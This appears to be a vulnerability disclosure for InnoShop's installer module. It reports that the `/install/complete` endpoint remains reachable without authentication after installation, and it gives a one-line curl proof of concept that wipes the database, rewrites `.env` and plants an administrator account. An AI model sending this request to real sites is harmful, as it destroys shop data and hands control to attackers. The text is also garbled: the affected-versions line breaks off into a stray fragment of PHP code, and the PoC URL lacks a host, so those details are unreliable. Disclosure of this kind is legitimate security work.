### Vulnerability Overview **Title**: [Security] Pre-auth Application Reinstall leads to full system takeover #314 **Description**: The installation module (`innopacks/install`) of InnoShop contains a critical pre-authentication vulnerability. After the application is fully installed, the `/install/complete` endpoint remains accessible without any authentication or CSRF protection. An unauthenticated attacker can send a single POST request to overwrite the `.env` file, wipe the entire database (via `migrate:fresh`), and create a new administrator account, thereby achieving complete system takeover. ### Affected Scope * **Affected Versions**: InnoShop loadRoutesFrom(__DIR__.'/../routes/web.php'); $this->loadViewsFrom(__DIR__.'/../resources/views', 'install'); $this->loadTranslationsFrom(__DIR__.'/../lang', 'install'); } ``` ### Exploit Code (POC) The following `curl` command is sufficient to exploit this vulnerability: ```bash curl -X POST "http:///install/complete" \ -H "Content-Type: application/x-www-form-urlencoded" \ -d "db_type=mysql&db_hostname=DB_HOST&db_port=3306&db_name=DB_NAME&db_username=DB_USER&db_password=DB_PASSWORD" ``` **Expected Result**: An HTTP 200 response containing `{"success": true, ...}`. The attacker can subsequently log in to `/panel` using the injected credentials.